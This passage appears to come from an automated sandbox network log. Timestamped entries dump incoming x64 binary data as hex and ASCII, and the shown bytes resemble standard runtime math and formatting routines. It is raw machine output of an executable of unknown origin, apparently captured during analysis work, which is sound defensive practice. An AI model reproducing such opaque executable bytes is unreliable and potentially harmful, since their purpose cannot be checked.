8b 8c 24 90 00 00 00 41 ff c9 44 89 8c 24 90 00 00 00 41 8d 81 fe 03 00 00 3d fd 07 00 00 77 36 49 63 c1 ba ff 03 00 00 48 03 c2 48 c1 e0 34 48 89 84 24 a8 00 Data Ascii: f/%r\D$@WD$8t$0H8D$("D$ DJMtIhIf/%H$A(fHD$8H$HD$0H$HD$(L$ )-TD$AD$A=w6IcHH4H$
2023-11-18 09:02:41 UTC	8712	IN	Data Raw: fa ff 0f 9d c0 85 c0 74 31 f2 0f 10 1d 83 28 17 00 f2 0f 5c de f2 0f 59 1d 5f 28 17 00 f2 0f 11 5c 24 78 f2 0f 51 54 24 78 f2 0f 11 54 24 70 f2 0f 10 64 24 70 0f 28 f4 eb 13 f2 0f 10 64 24 70 0f 28 de f2 0f 59 de f2 0f 11 5c 24 78 0f 28 cb 0f 28 c3 f2 0f 59 0d 61 eb 14 00 f2 0f 59 05 71 eb 14 00 f2 0f 58 0d 59 eb 14 00 f2 0f 5c 05 81 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 5c 0d 49 eb 14 00 f2 0f 58 05 79 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 58 0d 49 eb 14 00 f2 0f 5c 05 69 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 5c 0d 39 eb 14 00 f2 0f 58 05 41 eb 14 00 f2 0f 59 cb f2 0f 58 0d 15 eb 14 00 f2 0f 59 cb f2 0f 5e c8 85 c0 0f 84 94 00 00 00 f2 0f 10 1d 8d e1 14 00 48 b9 00 00 00 00 ff ff ff ff f2 0f 11 a4 24 80 00 00 00 48 8b 84 24 80 00 00 00 48 23 c1 48 89 Data Ascii: t1(\Y_(\$xQT$xT$pd$p(d$p(Y\$x((YaYqXY\YY\IXyYYXI\iYY\9XAYXY^H$H$H#H
2023-11-18 09:02:41 UTC	8713	IN	Data Raw: 24 28 21 00 00 00 41 8d 51 0c c7 44 24 20 08 00 00 00 e8 f4 78 00 00 e9 a9 01 00 00 0f 28 f0 4d 85 c0 74 07 0f 57 35 00 25 17 00 33 c0 83 fa ff 0f 9d c0 85 c0 74 31 f2 0f 10 25 fc 22 17 00 f2 0f 5c e6 f2 0f 59 25 d8 22 17 00 f2 0f 11 64 24 78 f2 0f 51 54 24 78 f2 0f 11 54 24 70 f2 0f 10 4c 24 70 0f 28 f1 eb 13 f2 0f 10 4c 24 70 0f 28 e6 f2 0f 59 e6 f2 0f 11 64 24 78 0f 28 ec 0f 28 c4 f2 0f 59 2d da e5 14 00 f2 0f 59 05 ea e5 14 00 f2 0f 58 2d d2 e5 14 00 f2 0f 5c 05 fa e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 5c 2d c2 e5 14 00 f2 0f 58 05 f2 e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 58 2d c2 e5 14 00 f2 0f 5c 05 e2 e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 5c 2d b2 e5 14 00 f2 0f 58 05 ba e5 14 00 f2 0f 59 ec f2 0f 58 2d 8e e5 14 00 f2 0f 59 ec f2 0f 5e e8 85 c0 Data Ascii: $(!AQD$ x(MtW5%3t1%"\Y%"d$xQT$xT$pL$p(L$p(Yd$x((Y-YX-\YY\-XYYX-\YY\-XYX-Y^
2023-11-18 09:02:41 UTC	8715	IN	Data Raw: 89 bc ec 10 02 00 00 49 ff c5 49 3b df 0f 83 f6 fd ff ff 4c 8b e3 e9 c8 fd ff ff 49 3b df 73 10 4a 89 5c ec 20 4e 89 bc ec 10 02 00 00 49 ff c5 4c 3b e7 0f 83 d0 fd ff ff 4c 8b ff e9 a2 fd ff ff 4c 8b ac 24 20 04 00 00 48 8b bc 24 28 04 00 00 48 8b b4 24 30 04 00 00 48 8b 9c 24 38 04 00 00 4c 8b bc 24 18 04 00 00 48 8b 8c 24 00 04 00 00 48 33 cc e8 b9 b8 ff ff 48 81 c4 40 04 00 00 41 5e 41 5c 5d c3 48 8b c4 f2 0f 11 40 08 53 48 81 ec a0 00 00 00 0f 29 70 e8 0f 28 d1 0f 29 78 d8 45 33 c9 44 0f 29 40 c8 0f 28 c8 f2 0f 11 84 24 b8 00 00 00 4c 8b 9c 24 b8 00 00 00 44 0f 29 48 b8 4d 8b d3 44 0f 29 50 a8 49 8b cb 48 b8 ff ff ff ff ff ff ff 7f 48 c1 e9 34 4c 23 d0 f2 0f 11 94 24 b8 00 00 00 48 8b 9c 24 b8 00 00 00 4c 8b c3 48 8b d3 4c 23 c0 48 c1 ea 34 b8 ff 07 Data Ascii: II;LI;sJ\ NIL;LL$ H$(H$0H$8L$H$H3H@A^A\]H@SH)p()xE3D)@($L$D)HMD)PIHH4L#$H$LHL#H4
2023-11-18 09:02:41 UTC	8716	IN	Data Raw: 66 0f 7f 74 24 20 66 0f 7f 7c 24 30 83 3d e2 2c 19 00 00 0f 85 60 02 00 00 66 48 0f 7e c2 0f 28 f0 48 8b ca 48 0f ba f1 3f 48 3b 0d b9 dc 14 00 0f 87 82 00 00 00 48 3b 0d 04 dd 14 00 73 5a 48 3b 0d f3 dc 14 00 73 21 48 3b 0d 1a dd 14 00 74 53 f2 0f 10 c8 f2 0f 59 0d 2c dd 14 00 f2 0f 58 0d 0c dd 14 00 eb 3d 66 90 f2 0f 59 c0 f2 0f 59 c6 f2 0f 59 05 e0 db 14 00 f2 0f 58 c6 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 0f 1f 84 00 00 00 00 00 0f 57 c9 45 33 c0 e8 15 05 00 00 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 48 3b 0d 8a dc 14 00 72 28 e8 d7 75 00 00 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 45 33 c0 4d 33 d2 48 3b ca 41 0f 95 c2 66 0f 54 35 2b db 14 00 f2 Data Ascii: ft$ f\|$0=,`fH~(HH?H;H;sZH;s!H;tSY,X=fYYYXfo\|$0fot$ HWE3fo\|$0fot$ HH;r(ufo\|$0fot$ HfffffffE3M3H;AfT5+
2023-11-18 09:02:41 UTC	8717	IN	Data Raw: 14 00 c5 d3 5c c0 c5 fb 58 c6 e9 5d fd ff ff c5 fb 10 3d 09 d8 14 00 c5 d3 58 c0 c5 fb 58 c6 e9 48 fd ff ff 66 66 66 66 0f 1f 84 00 00 00 00 00 e8 db 6d 00 00 e9 f0 fd ff ff e8 05 71 00 00 c5 f9 6f 7c 24 30 c5 f9 6f 74 24 20 48 81 c4 88 00 00 00 c3 66 66 66 66 66 0f 1f 84 00 00 00 00 00 48 83 ec 48 66 0f 7f 74 24 30 33 c0 66 0f 2f 05 8c d7 14 00 0f 28 d9 0f 28 f0 76 29 f2 0f 10 15 0c d7 14 00 b8 01 00 00 00 f2 0f 5c d0 f2 0f 10 05 0b d7 14 00 f2 0f 5c c1 0f 28 f2 f2 0f 58 f0 0f 57 db eb 28 f2 0f 10 05 5b d7 14 00 66 0f 2f c6 76 1a f2 0f 58 35 d5 d6 14 00 f2 0f 58 1d dd d6 14 00 83 c8 ff f2 0f 58 f3 0f 57 db 0f 28 c6 0f 28 d6 f2 0f 59 c6 f2 0f 58 d2 f2 0f 59 d3 f2 0f 58 d0 0f 28 c2 0f 28 ea 0f 28 ca f2 0f 59 2d 3c d6 14 00 f2 0f 59 0d 74 d6 14 00 f2 0f 59 Data Ascii: \X]=XXHffffmqo\|$0ot$ HfffffHHft$03f/((v)\\(XW([f/vX5XXW((YXYX(((Y-<YtY
2023-11-18 09:02:41 UTC	8719	IN	Data Raw: c0 c9 eb 03 41 8b c4 41 b9 08 00 00 00 85 c0 74 0b 45 85 ff 75 44 45 8d 79 02 eb 3e 48 8b 03 8a 10 48 8d 48 01 48 89 0b 8d 42 a8 a8 df 74 47 45 85 ff 45 0f 44 f9 48 ff c9 48 89 0b 84 d2 74 1a 38 11 74 16 e8 76 12 00 00 c7 00 16 00 00 00 e8 b7 6d 00 00 41 b9 08 00 00 00 33 d2 41 8b c4 41 f7 f7 44 8b c0 8d 4f d0 80 f9 09 77 21 40 0f be cf 83 c1 d0 eb 3b 40 8a 39 b8 10 00 00 00 45 85 ff 44 0f 44 f8 48 8d 41 01 48 89 03 eb cc 8d 47 9f 3c 19 77 09 40 0f be cf 83 c1 a9 eb 13 8d 47 bf 3c 19 77 09 40 0f be cf 83 c1 c9 eb 03 41 8b cc 41 3b cc 74 2d 41 3b cf 73 28 45 0b f1 41 3b f0 72 0c 75 04 3b ca 76 06 41 83 ce 04 eb 06 41 0f af f7 03 f1 48 8b 03 40 8a 38 48 ff c0 48 89 03 eb 82 48 ff 0b 48 8b 03 40 84 ff 74 15 40 38 38 74 10 e8 c7 11 00 00 c7 00 16 00 00 00 e8 Data Ascii: AAtEuDEy>HHHHBtGEEDHHt8tvmA3AADOw!@;@9EDDHAHG<w@G<w@AA;t-A;s(EA;ru;vAAH@8HHHH@t@88t
2023-11-18 09:02:41 UTC	8720	IN	Data Raw: 73 1c e9 7f fe ff ff 66 3b 5c 24 64 73 08 0f b7 c3 41 2b c3 eb 03 83 c8 ff 83 f8 ff 75 29 8d 43 bf 66 83 f8 19 76 0e 8d 43 9f 66 83 f8 19 76 05 83 c8 ff eb 12 8d 43 9f 66 83 f8 19 0f b7 c3 77 03 83 e8 20 83 c0 c9 be 08 00 00 00 85 c0 74 0b 45 85 ff 75 55 44 8d 7e 02 eb 4f 48 8b 07 41 b8 df ff 00 00 0f b7 10 48 8d 48 02 48 89 0f 8d 42 a8 66 41 85 c0 74 69 45 85 ff 44 0f 44 fe 48 83 c1 fe 48 89 0f 66 85 d2 74 1b 66 39 11 74 16 e8 d2 0c 00 00 c7 00 16 00 00 00 e8 13 68 00 00 41 bb 10 ff 00 00 b9 30 00 00 00 4d 63 d7 33 d2 48 83 c8 ff 41 bd 60 06 00 00 49 f7 f2 41 bc f0 06 00 00 4c 8b c8 66 3b d9 0f 82 d4 01 00 00 66 83 fb 3a 73 2b 44 0f b7 c3 44 2b c1 e9 bc 01 00 00 0f b7 19 b8 10 00 00 00 45 85 ff 44 0f 44 f8 48 8d 41 02 48 89 07 eb ad be 08 00 00 00 eb ab Data Ascii: sf;\$dsA+u)CfvCfvCfw tEuUD~OHAHHHBfAtiEDDHHftf9thA0Mc3HA`IALf;f:s+DD+EDDHAH
2023-11-18 09:02:41 UTC	8721	IN	Data Raw: 01 c3 cc cc cc 48 8b c4 48 89 58 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 33 db 0f 29 70 b8 0f 29 78 a8 48 ba ff ff ff ff ff ff ff 7f 44 0f 29 40 98 49 ba 00 00 00 00 00 00 f0 7f 44 0f 29 48 88 41 bb ff 07 00 00 f2 0f 11 8c 24 b0 00 00 00 44 8b cb 4c 8b b4 24 b0 00 00 00 44 8b c3 f2 0f 11 84 24 b0 00 00 00 49 8b c6 4c 8b bc 24 b0 00 00 00 48 23 c2 49 8b cf 44 0f 29 54 24 20 48 23 ca 4d 8b e6 49 c1 ec 34 48 ba 00 00 00 00 00 00 00 80 45 23 e3 4d 8b ef 49 c1 ed 34 49 8b ee 48 23 ea 45 23 eb 49 8b f7 41 8b fd 48 23 f2 44 0f 28 c9 48 85 c0 8b d3 44 0f 28 c0 0f 94 c2 49 3b c2 41 0f 94 c1 49 3b ca 44 89 8c 24 b8 00 00 00 41 0f 94 c0 41 2b fc 44 89 84 24 b0 00 00 00 49 3b c2 76 0d 49 8b ce e8 2f 59 00 00 e9 31 06 00 00 49 3b ca 76 05 49 8b cf eb ec 48 85 Data Ascii: HHXUVWATAUAVAWHp3)p)xHD)@ID)HA$DL$D$IL$H#ID)T$ H#MI4HE#MI4IH#E#IAH#D(HD(I;AI;D$AA+D$I;vI/Y1I;vIH
2023-11-18 09:02:41 UTC	8723	IN	Data Raw: f2 0f 10 94 24 b0 00 00 00 f2 0f 5c ca f2 0f 59 e0 0f 28 c2 f2 0f 59 c6 f2 0f 59 ce 0f 28 dc f2 0f 59 f4 f2 0f 5c d8 f2 0f 58 f5 f2 0f 5c d9 f2 0f 10 0d 0d d2 14 00 f2 0f 5e de 0f 28 d3 0f 28 eb f2 0f 59 d3 f2 0f 58 ef 0f 28 c2 f2 0f 59 05 e0 d1 14 00 f2 0f 5c c8 f2 0f 59 ca f2 0f 59 cb f2 0f 5c e9 e9 02 01 00 00 f2 0f 10 05 03 fd 16 00 45 0f 57 d2 66 0f 2f c5 0f 87 ec 00 00 00 f2 44 0f 11 8c 24 b0 00 00 00 48 b9 00 00 00 00 ff ff ff ff 48 8b 84 24 b0 00 00 00 0f 28 e5 f2 0f 59 e5 48 23 c1 48 89 84 24 b0 00 00 00 f2 0f 10 9c 24 b0 00 00 00 41 0f 28 c9 f2 0f 5c cb f2 0f 11 ac 24 b0 00 00 00 48 8b 84 24 b0 00 00 00 48 23 c1 48 89 84 24 b0 00 00 00 f2 0f 10 94 24 b0 00 00 00 f2 0f 59 ca 0f 28 c2 f2 0f 59 c3 f2 44 0f 5c c0 0f 28 c5 f2 0f 5c c2 f2 44 0f 5c c1 Data Ascii: $\Y(YY(Y\X\^((YX(Y\YY\EWf/D$HH$(YH#H$$A(\$H$H#H$$Y(YD\(\D\
2023-11-18 09:02:41 UTC	8724	IN	Data Raw: 38 85 c0 7f 05 4d 85 db 74 37 ff c8 33 d2 41 89 42 38 49 8b c3 48 f7 f3 80 c2 30 4c 8b d8 80 fa 39 7e 12 41 8a c1 f6 d8 1a c9 80 e1 e0 80 c1 61 80 e9 3a 02 d1 49 8b 42 48 88 10 49 ff 4a 48 eb bc 45 2b 42 48 49 ff 42 48 48 8b 5c 24 08 45 89 42 50 c3 48 89 5c 24 08 45 33 db 48 8b d9 45 85 c0 7e 45 4c 8b 13 49 8b 42 08 49 39 42 10 75 12 41 80 7a 18 00 74 05 41 ff 01 eb 1e 41 83 09 ff eb 18 41 ff 01 48 8b 03 48 ff 40 10 48 8b 03 48 8b 08 88 11 48 8b 03 48 ff 00 41 83 39 ff 74 08 41 ff c3 45 3b d8 7c bb 48 8b 5c 24 08 c3 cc 40 53 48 83 ec 20 48 8b d9 33 c9 48 89 0b 48 89 4b 08 48 89 4b 18 48 89 4b 20 48 89 4b 10 48 89 4b 28 48 89 4b 30 89 4b 38 66 89 4b 40 89 4b 50 88 4b 54 48 89 8b 58 04 00 00 48 89 8b 60 04 00 00 48 8b 02 48 89 83 68 04 00 00 48 8b 44 24 50 Data Ascii: 8Mt73AB8IH0L9~Aa:IBHIJHE+BHIBHH\$EBPH\$E3HE~ELIBI9BuAztAAAHH@HHHHA9tAE;\|H\$@SH H3HHKHKHK HKHK(HK0K8fK@KPKTHXH`HHhHD$P
2023-11-18 09:02:41 UTC	8726	IN	Data Raw: 08 0f 85 43 01 00 00 c7 41 2c 08 00 00 00 e8 ef f7 ff ff c7 00 16 00 00 00 e8 30 53 00 00 32 c0 e9 27 01 00 00 83 79 3c 00 75 e3 3c 49 0f 84 ba 00 00 00 3c 4c 0f 84 a9 00 00 00 3c 54 0f 84 98 00 00 00 3c 68 74 72 3c 6a 74 62 3c 6c 74 36 3c 74 74 26 3c 77 74 16 3c 7a b0 01 0f 85 eb 00 00 00 c7 41 3c 06 00 00 00 e9 df 00 00 00 c7 41 3c 0c 00 00 00 e9 d1 00 00 00 c7 41 3c 07 00 00 00 e9 c5 00 00 00 48 8b 41 18 80 38 6c 75 13 48 ff c0 c7 41 3c 04 00 00 00 48 89 41 18 e9 a9 00 00 00 c7 41 3c 03 00 00 00 e9 9d 00 00 00 c7 41 3c 05 00 00 00 e9 91 00 00 00 48 8b 41 18 80 38 68 75 10 48 ff c0 c7 41 3c 01 00 00 00 48 89 41 18 eb 78 c7 41 3c 02 00 00 00 eb 6f c7 41 3c 0d 00 00 00 eb 66 c7 41 3c 08 00 00 00 eb 5d 48 8b 51 18 8a 02 3c 33 75 17 80 7a 01 32 75 11 48 8d Data Ascii: CA,0S2'y<u<I<L<T<htr<jtb<lt6<tt&<wt<zA<A<A<HA8luHA<HAA<A<HA8huHA<HAxA<oA<fA<]HQ<3uz2uH
2023-11-18 09:02:41 UTC	8727	IN	Data Raw: 03 0f be 4b 41 48 0f 44 d7 48 89 44 24 38 8b 43 38 89 44 24 30 89 4c 24 28 48 8d 4c 24 60 4c 89 4c 24 20 4d 8b ca e8 9e 88 00 00 8b 43 30 c1 e8 05 a8 01 74 13 83 7b 38 00 75 0d 48 8b 53 08 48 8b 4b 48 e8 31 f6 ff ff 8a 43 41 2c 47 a8 df 75 6d 8b 43 30 c1 e8 05 a8 01 75 63 48 8b 43 08 48 8b 53 48 48 8b 08 48 8b 81 f8 00 00 00 48 8b 08 44 8a 01 eb 08 41 3a c0 74 09 48 ff c2 8a 02 84 c0 75 f2 8a 02 48 ff c2 84 c0 74 32 eb 09 2c 45 a8 df 74 09 48 ff c2 8a 02 84 c0 75 f1 48 8b ca 48 ff ca 80 3a 30 74 f8 44 38 02 75 03 48 ff ca 8a 01 48 ff c2 48 ff c1 88 02 84 c0 75 f2 48 8b 43 48 80 38 2d 75 0b 83 4b 30 40 48 ff c0 48 89 43 48 48 8b 53 48 8a 02 2c 49 3c 25 77 14 48 b9 21 00 00 00 21 00 00 00 48 0f a3 c1 73 04 c6 43 41 73 48 83 c9 ff 48 ff c1 80 3c 0a 00 75 f7 Data Ascii: KAHDHD$8C8D$0L$(HL$`LL$ MC0t{8uHSHKH1CA,GumC0ucHCHSHHHHDA:tHuHt2,EtHuHH:0tD8uHHHuHCH8-uK0@HHCHHSH,I<%wH!!HsCAsHH<u
2023-11-18 09:02:41 UTC	8728	IN	Data Raw: 3b 7b 50 75 ab eb 27 83 4b 28 ff eb 21 48 8b 43 10 4c 8d 49 28 44 8b 43 50 48 81 c1 68 04 00 00 48 8b 53 48 48 89 44 24 20 e8 22 00 00 00 b0 01 48 8b 4c 24 40 48 33 cc e8 7b 83 ff ff 48 8b 5c 24 68 48 8b 74 24 70 48 83 c4 50 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 ec 20 48 8b 7c 24 60 4c 8b f9 49 8b d9 49 63 e8 44 8b 37 83 27 00 48 8b 09 48 8b 41 08 48 39 41 10 75 11 80 79 18 00 74 05 41 01 29 eb 45 41 83 09 ff eb 3f 48 2b 41 10 48 8b f5 48 8b 09 48 3b c5 48 0f 42 f0 4c 8b c6 e8 00 92 ff ff 49 8b 07 48 01 30 49 8b 07 48 01 70 10 49 8b 07 80 78 18 00 74 04 01 2b eb 0c 48 3b f5 74 05 83 0b ff eb 02 01 33 83 3f 00 75 08 45 85 f6 74 03 44 89 37 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 Data Ascii: ;{Pu'K(!HCLI(DCPHhHSHHD$ "HL$@H3{H\$hHt$pHP_HHXHhHpHx ATAVAWH H\|$`LIIcD7'HHAH9AuytA)EA?H+AHHH;HBLIH0IHpIxt+H;t3?uEtD7H\$@Hl$HHt$PH\|$X
2023-11-18 09:02:41 UTC	8730	IN	Data Raw: 0f 28 c8 f2 0f 58 0d ac ba 14 00 f2 0f 58 05 94 ba 14 00 48 83 c4 38 c3 0f 1f 80 00 00 00 00 66 0f ef c0 48 83 c4 38 c3 0f 1f 80 00 00 00 00 48 83 c4 38 c3 66 66 66 0f 1f 84 00 00 00 00 00 c5 fb c2 15 07 ba 14 00 02 c5 fb c2 1d 06 ba 14 00 05 c5 e0 54 d2 c5 f9 2e d2 7a 14 c5 f9 2e 05 ec b9 14 00 0f 87 06 01 00 00 e9 41 01 00 00 90 c4 e1 f9 7e c2 48 0f ba f2 3f 48 3b 15 2f ba 14 00 0f 86 09 01 00 00 c5 fb 59 0d d9 b9 14 00 c5 f9 e6 d1 c5 fa e6 ca c5 f9 7e d1 c5 f0 16 c9 c5 fa 7e c0 c4 e2 f9 98 0d 84 b9 14 00 c5 f1 7c d1 48 c7 c0 3f 00 00 00 23 c1 c1 f9 06 c5 f9 28 1d 1c b9 14 00 c4 e2 e9 a9 1d 23 b9 14 00 c4 e2 e9 a9 1d 4a b9 14 00 c4 e2 e9 a9 1d 21 b9 14 00 c4 e2 e9 a9 1d 28 b9 14 00 c5 eb 59 c2 c4 e2 e1 a9 c2 81 f9 02 fc ff ff 48 8d 15 32 f4 14 00 4c 8d Data Ascii: (XXH8fH8H8fffT.z.A~H?H;/Y~~\|H?#(#J!(YH2L
2023-11-18 09:02:41 UTC	8731	IN	Data Raw: 00 00 f2 0f 10 8c 24 90 00 00 00 f2 0f 58 8c 24 98 00 00 00 f2 0f 59 ca f2 0f 59 c8 f2 0f 58 cf f2 0f 5e f1 f2 0f 5c fe 4d 85 d2 74 07 0f 57 3d 72 df 16 00 0f 28 c7 0f 28 74 24 60 0f 28 7c 24 50 44 0f 28 44 24 40 48 83 c4 78 c3 cc cc cc cc cc cc cc cc cc cc 48 81 ec d8 00 00 00 66 0f 7f b4 24 90 00 00 00 66 0f 7f bc 24 a0 00 00 00 83 3d ac f1 18 00 00 0f 85 1b 0c 00 00 66 66 0f 1f 84 00 00 00 00 00 f2 0f 11 44 24 20 f2 0f 11 4c 24 30 48 8b 54 24 20 4c 8b 44 24 30 4c 8b 15 db b7 14 00 4d 23 d0 0f 84 4a 07 00 00 4c 3b 05 bb b7 14 00 0f 84 8d 07 00 00 4c 8b 0d 86 b7 14 00 4c 23 ca 48 8b 05 ac b7 14 00 48 89 44 24 50 4c 3b 0d 70 b7 14 00 0f 84 ea 04 00 00 48 3b 15 8b b7 14 00 0f 84 cd 06 00 00 48 3b 15 86 b7 14 00 0f 84 80 08 00 00 4c 8b 0d 59 b7 14 00 4c 23 Data Ascii: $X$YYX^\MtW=r((t$`(\|$PD(D$@HxHf$f$=ffD$ L$0HT$ LD$0LM#JL;LL#HHD$PL;pH;H;LYL#
2023-11-18 09:02:41 UTC	8732	IN	Data Raw: 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d e9 b3 14 00 4c 0b 5c 24 50 e9 cf 05 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 0f eb 15 48 b4 14 00 f2 0f 5c 15 40 b4 14 00 f2 0f 10 ea 66 0f db 15 d4 b3 14 00 66 49 0f 7e d0 66 0f 73 d5 34 66 0f fa 2d c2 b4 14 00 f3 0f e6 f5 e9 b5 fb ff ff 66 0f 1f 84 00 00 00 00 00 4c 8b 15 89 b2 14 00 4d 23 d0 4c 3b 15 5f b2 14 00 0f 8f 49 03 00 00 4c 8b 15 9a b2 14 00 4d 23 d0 4d 8b da 48 8b 0d cd b2 14 00 49 d3 ea 4c 2b 15 cb b2 14 00 0f 88 d5 02 00 00 48 8b 05 76 b2 14 00 48 23 c2 48 89 44 24 60 49 8b ca 4c 3b 15 bc b2 14 00 7f 2e 4c 8b 0d bb b2 14 00 49 d3 e9 4d 23 cb 0f 85 a7 02 00 00 4c 8b 0d b0 b2 14 00 49 d3 e9 4d 23 cb 74 0c 48 8b 05 01 b2 14 00 48 89 44 24 50 48 3b 15 65 b2 14 00 0f 84 1f 03 00 00 48 Data Ascii: fffffLL\$PffffffffH\@ffI~fs4f-fLM#L;_ILM#MHIL+HvH#HD$`IL;.LIM#LIM#tHHD$PH;eH
2023-11-18 09:02:41 UTC	8734	IN	Data Raw: e9 b8 f9 ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 33 db 4c 8b 15 76 ad 14 00 4d 23 d0 4c 0f 45 1d 8b ad 14 00 eb 29 66 0f 1f 84 00 00 00 00 00 4d 33 db 4c 8b 15 56 ad 14 00 4d 23 d0 4c 0f 44 1d 6b ad 14 00 66 66 66 0f 1f 84 00 00 00 00 00 48 33 c0 4d 8b c8 4c 8b 15 43 ad 14 00 4c 0b 0d 8c ad 14 00 4d 23 d0 4c 3b 15 32 ad 14 00 49 0f 44 c0 4c 8b 15 57 ad 14 00 4c 23 d0 4d 0f 45 d9 0f 85 aa 00 00 00 48 85 c0 75 45 0f 1f 44 00 00 44 8b 0d d1 ac 14 00 4c 85 1d 2a ad 14 00 44 0f 45 0d ca ac 14 00 f2 0f 10 44 24 20 f2 0f 10 4c 24 30 66 49 0f 6e d3 e8 74 74 00 00 e9 f8 f8 ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 49 0f 6e c3 e9 df f8 ff ff 66 0f 1f 44 00 00 48 33 c0 4c 8b 15 b6 ac 14 00 4d 23 d0 4c 3b 15 ac ac 14 00 49 0f 44 c0 4c 8b 15 Data Ascii: fffffffM3LvM#LE)fM3LVM#LDkfffH3MLCLM#L;2IDLWL#MEHuEDDL*DED$ L$0fInttffffffffInfDH3LM#L;IDL
2023-11-18 09:02:41 UTC	8735	IN	Data Raw: a9 14 00 0f 83 c2 00 00 00 c5 f9 56 05 ba ba 14 00 c5 f9 56 44 24 50 eb b9 66 90 41 8b c9 45 33 db c5 f9 2f 05 a2 a9 14 00 44 0f 43 d9 44 3b 1d 87 ba 14 00 75 15 c5 fb 59 44 24 40 c5 f9 56 44 24 50 eb 8e 0f 1f 80 00 00 00 00 4d 33 c0 48 3b 15 a6 ba 14 00 49 c7 c1 01 00 00 00 7f 2d 81 c1 32 04 00 00 49 0f 48 c8 49 d3 e1 49 8b c9 48 89 4c 24 40 c5 fb 59 44 24 40 c5 f9 56 44 24 50 e9 37 06 00 00 0f 1f 80 00 00 00 00 c5 fb 10 05 58 ba 14 00 c5 f9 56 44 24 50 e9 1d 06 00 00 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d 29 ba 14 00 4c 0b 5c 24 50 e9 cf 04 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d 79 a8 14 00 4c 0b 5c 24 50 e9 af 04 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c5 e9 eb 15 d8 a8 14 00 c5 eb 5c 15 d0 a8 14 00 c5 f9 28 ea Data Ascii: VVD$PfAE3/DCD;uYD$@VD$PM3H;I-2IHIIHL$@YD$@VD$P7XVD$PfffffL)L\$PfffffffLyL\$Pfffffff\(
2023-11-18 09:02:41 UTC	8736	IN	Data Raw: 0b 0d 3c a3 14 00 4d 23 d0 4c 3b 15 e2 a2 14 00 49 0f 44 c0 4c 8b 15 07 a3 14 00 4c 23 d0 4d 0f 45 d9 0f 85 aa 00 00 00 48 85 c0 75 45 0f 1f 44 00 00 44 8b 0d 81 a2 14 00 4c 85 1d da a2 14 00 44 0f 45 0d 7a a2 14 00 c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 e8 24 6a 00 00 e9 16 fa ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c4 c1 f9 6e c3 e9 fd f9 ff ff 66 0f 1f 44 00 00 48 33 c0 4c 8b 15 66 a2 14 00 4d 23 d0 4c 3b 15 5c a2 14 00 49 0f 44 c0 4c 8b 15 81 a2 14 00 4c 23 d0 75 5c c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 44 8b 0d ec a1 14 00 e8 bf 69 00 00 e9 b1 f9 ff ff 66 66 0f 1f 84 00 00 00 00 00 c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 44 8b 0d c4 a1 14 00 e8 93 69 00 00 e9 85 f9 ff ff 66 66 66 66 66 66 0f 1f 84 00 00 Data Ascii: <M#L;IDLL#MEHuEDDLDEzD$ L$0n$jfffffffnfDH3LfM#L;\IDLL#u\D$ L$0nDiffD$ L$0nDiffffff
2023-11-18 09:02:41 UTC	8738	IN	Data Raw: 0f 58 2d da c2 16 00 f2 0f 59 f0 0f 28 c2 f2 0f 59 e9 f2 0f 10 8c c1 d0 67 15 00 0f 28 f9 f2 41 0f 59 c8 f2 0f 59 fe f2 0f 59 c5 f2 0f 58 f8 f2 0f 58 f9 0f 28 cc f2 0f 59 cd f2 0f 58 fa 0f 28 d3 f2 0f 59 d6 f2 41 0f 59 d8 f2 0f 58 f9 f2 0f 58 fa f2 0f 58 fb f2 0f 58 fc 0f 28 c7 0f 28 74 24 70 0f 28 7c 24 60 44 0f 28 44 24 50 48 81 c4 80 00 00 00 5b c3 cc cc cc 48 83 ec 38 f2 0f 10 2d 5c c2 16 00 0f 28 e0 0f 29 74 24 20 0f 28 f0 0f 29 7c 24 10 0f 28 f9 f2 0f 59 e2 44 0f 29 04 24 44 0f 28 c3 66 0f 2f 25 b4 84 14 00 76 06 f2 0f 58 e5 eb 04 f2 0f 5c e5 f2 44 0f 2c c4 48 8d 15 94 4b ff ff 41 8b c8 83 e1 1f 48 63 c1 66 41 0f 6e c0 Data Ascii: X-Y(Yg(AYYYXX(YX(YAYXXXX((t$p(\|$`D(D$PH[H8-\()t$ ()\|$(YD)$D(f/%vX\D,HKAHcfAn
